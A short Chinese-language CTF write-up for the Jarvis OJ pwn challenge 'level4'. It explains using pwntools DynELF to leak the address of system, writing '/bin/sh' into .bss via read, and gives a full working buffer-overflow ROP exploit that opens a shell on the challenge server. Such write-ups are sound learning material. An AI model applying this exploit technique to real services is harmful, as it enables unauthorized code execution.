(Jarvis Oj)(Pwn) level4

(Jarvis Oj)(Pwn) level4

先看一下保护措施，没什么奇怪的地方。

这次并没有给libc的文件，开始通过泄露得到的__libc_start_main地址对照libc库，并没有成功。于是就学了一波DynELF，这个模块的原理还是不太清楚（玄学），以后来填。总之利用这个模块可以找到system的地址，但是找不到”/bin/sh”这个字符串位置，但是我们可以控制read函数，所以可以通过调用read函数，将”bin/sh”写入到.bss段中，于是所有条件都齐了，写得脚本。

from pwn import *
conn=remote('pwn2.jarvisoj.com','9880')
#conn=process('./level4')
e=ELF('./level4')
pad=0x88
write_plt=e.symbols['write']
vul_addr=0x804844b
bss_addr=0x0804a024
def leak(address):
    payload1='a'*pad+"BBBB"+p32(write_plt)+p32(vul_addr)+p32(1)+p32(address)+p32(4)
    conn.sendline(payload1)
    data=conn.recv(4)
    return data 
d=DynELF(leak,elf=e)
system_addr=d.lookup('system','libc')
print hex(system_addr)
read_plt=e.symbols['read']
payload2='a'*pad+"BBBB"+p32(read_plt)+p32(vul_addr)+p32(0)+p32(bss_addr)+p32(8)
conn.sendline(payload2)
conn.send("/bin/sh\x00")
payload3="a"*pad+"BBBB"+p32(system_addr)+'dead'+p32(bss_addr)
conn.sendline(payload3)
conn.interactive()